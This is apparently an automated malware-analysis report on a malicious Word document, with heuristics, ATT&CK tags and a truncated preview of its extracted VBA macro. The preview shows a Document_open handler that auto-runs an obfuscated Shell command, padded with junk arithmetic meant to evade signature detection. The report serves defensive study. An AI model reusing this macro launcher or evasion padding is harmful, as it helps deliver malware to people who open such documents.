Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is an Office document containing VBA macros. A critical heuristic fired on a Shell() call in the VBA code, which launches an external command; the call sits inside a Document_open handler, so it runs automatically when the document is opened and macros are enabled. The ClamAV detection name 'Doc.Malware.Valyria-6744893-0' further confirms its malicious nature. In the extracted preview the Shell() call is the only operative statement: the surrounding functions consist of arithmetic on variables that are never assigned, each guarded by On Error Resume Next, which is junk code of the kind used to pad the module and evade signature matching. The command string itself is built by concatenating dozens of variables, none of which is assigned in the portion of the macro shown, so the command cannot be read off the excerpt. The pattern is consistent with downloading and executing a second-stage payload, a common delivery technique, but the actual command has to be recovered from the full 57 KB source or by running the macro in an instrumented sandbox.
Heuristics (5)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Malware.Valyria-6744893-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Malware.Valyria-6744893-0 |
| VBA macros detected | medium (2 related findings) | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). |

The single extracted URL is the DrawingML XML namespace identifier that is present in practically every Office Open XML document; it is not a network indicator and is unrelated to the macro.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 57073 bytes | efd69becae3e381584d61a6634bc2e52ff2aa61885908ff9078309764fee254b |
Preview: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "CMhRuMUYwz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function tpUwMNTwZlvM()
On Error Resume Next
UhwzCk = CPfplF - HQoWEG + 94882 + 69231 * jsODiH + ozkOZ - 84064 * wPzVt / iARiBS * Zmaqpk
hiRfl = iZrKnw - GUzCO + 86653 + 42596 * hnljH + dUidz - 91029 * ztHwBu / jHFiq * PlQlw
IiIqw = AKBXw - LXPIo + 89313 + 70453 * aKJBJm + fSwmLv - 46266 * zphFDb / WVqPum * WulGf
WkBHBM = aQwiA - oEaizY + 4584 + 38588 * vdsTm + umhYm - 99621 * wPsFzZ / YVPMP * twHzoQ
UHjLiU = ElmSnc - THojX + 71393 + 77841 * KtrwWv + AEQYz - 55894 * BtZGwS / DwHJqD * wZIOIf
Ezqjwd = FEIhqB - JarFMw + 1698 + 50623 * iCqns + EzjSCa - 95755 * bzXDQ / zXspiG * Yfjjr
FojDv = qrArW - HpGFk + 6856 + 83767 * fajCL + kCXuY - 78103 * qtbSRw / oJQqfD * jjVFls
oYOiZ = jiRJNw - GLlsZ + 56064 + 2193 * aNjDHT + ijkWnV - 19035 * iXZbmu / GwQWm * WFPnKX
End Function
Private Function UuczhadE()
On Error Resume Next
ulOUl = FhdiTt - OQKaj + 93015 + 1862 * oKUTU + wlVdl - 14645 * FrwUk / cJzKz * VrKLTt
cXOSC = VGUdK - IILlfw + 9941 + 61091 * sErYlA + ooITWi - 75960 * GAlzsl / nlfZdl * QzCzUj
sAZsQ = jVnRiS - ccMjTV + 57327 + 86705 * nkpBG + swZpiE - 29691 * SNDOp / fVhCI * UUrKjS
WGbtAR = IvIEh - uIYOFw + 73386 + 47562 * ozVmwU + aCkEbz - 99290 * CUTnT / rGRva * mwNvvH
MoCOs = cosojh - PuVQG + 76957 + 66497 * RCntGQ + HPGQo - 92600 * dLpWr / qdsSam * aVtdi
End Function
Private Function IisjUnUGShT()
On Error Resume Next
TDYnl = GaNzF - ikLNE + 87568 + 7112 * BwiXq + XfSjJd - 35792 * QoUPMX / aVNlB * OCLaY
rFhwHO = hfzAa - VkXaH + 51302 + 44974 * zUIlr + bwNwpT - 89184 * zrzHE / iDqSO * ndwUY
imTFEU = JpWIi - WCpnv + 18871 + 6689 * TnZRS + oKXzk - 36822 * BimjoS / USIjC * RSQfl
VtkYL = mhkRA - HIGmj + 54971 + 98795 * Orudq + Vowwt - 45846 * EZVNSm / SbtlqG * NhqRs
IWYBz = oaHjo - nwTWto + 64256 + 62227 * aaRmo + IcHFl - 12238 * YtPSR / ioSpZ * NVujR
hKwtn = UhzSYY - MUTDG + 13420 + 83678 * tBfpPz + WtrLaF - 11888 * jssCzj / AjLrH * wNZiRb
End Function
Private Function QWrRfVqYaUjfiM()
On Error Resume Next
azrndc = FRYfK - luGLpb + 77185 + 80529 * jWVWbA + VvVFl - 83640 * LSmNQG / vFqtX * FSdzSv
EmiwSS = LlRPAz - tXAdM + 66253 + 37458 * tobUF + rnsdEk - 73043 * AQbFh / KTYcl * fCiRz
LGRFsM = sNYKR - NDLjG + 41548 + 51223 * UHSvH + IEwllu - 19526 * dCRBD / zEGKY * NRVwXq
VSHAW = vdJEFu - vtCNX + 68641 + 15422 * QfcEDQ + RXnpu - 30913 * AfMuXZ / wlocj * YajuM
rwzKlN = nRmZX - EZJSF + 33865 + 51126 * QAHWH + rizOuM - 44772 * fCGPq / LmTkBl * rMiSZ
End Function
Private Sub Document_open()
On Error Resume Next
BDflI = jBnisB - ZjcVlu + 51080 + 15492 * BfbPjm + PzRhp - 10746 * kHlzdO / zsbkZ * bEzmSM
aBLKO = zWNhwE - QdGRI + 6495 + 23486 * diXsuF + rTCnt - 21572 * YZmism / lmTDPo * dYpoJ
ToRTtp = tiJKKn - jidKZ + 68731 + 84224 * DpfQzN + MwjWfF - 70864 * KzzOr / KsEBG * tLdkFF
Shell "" + KtItwYjbTzTDrO + wtbBnzfKvbKziP + CVar("c") + alwsrkQ + QHkFnkqzr + dTUEFJT + LaJnrfIm + YPpzwPPWafm + rjIINJIto + COCXnlTiBTj + lPVYKWKHB + SZcHXNzpic + cQFtNUhdIh + hFUdzvDjV + lhGmrzoZvi + iabbLYBc + uZiXLKJz + tzOiPYpI + itimN + EHiVnzz + Vlpjw + YzPoj + MKVXFifJSi + fMFrhkNiGKN + jSEsKUiBUB + JcGIqzXK + mKVjUU + OPzzzRK + qSsfE + AohbhUC + tikbSiDUT + ocrRzRKboIw + TKbVAosz, 0
VCVXQ = ODSrL - RWDCv + 50696 + 26759 * FCZji + SHmiU - 46779 * tSiVqz / qlLWPA * LnPRT
rQBBU = QZizsV - GwspA + 32681 + 31472 * HAjsTI + FisfON - 99089 * zQpbX / QwRznV * IzsjK
QRJBqj = zGNHJ - wuYKp + 86229 + 18383 * ESujnL + jAzErO - 70015 * HolqOQ / EpdObO * hrRNtM
End Sub
Private Function cjzHipTVRwdFk()
On Error Resume Next
SObKC = wlUcw - WYKBu + 81260 + 96110 * BNDrdX + FdkZvc - 24677 * iXLAb / rVVSk * hTzCJ
WrOiKo = oHbBm - hwdFp + 8766 + 37622 * kaFOJ + QGuMPw - 33553 * Ujsdq / iWHkj * cAjli
qqzSRD = YKCowT - dhjUl + 27551 + 3346
... (truncated)
```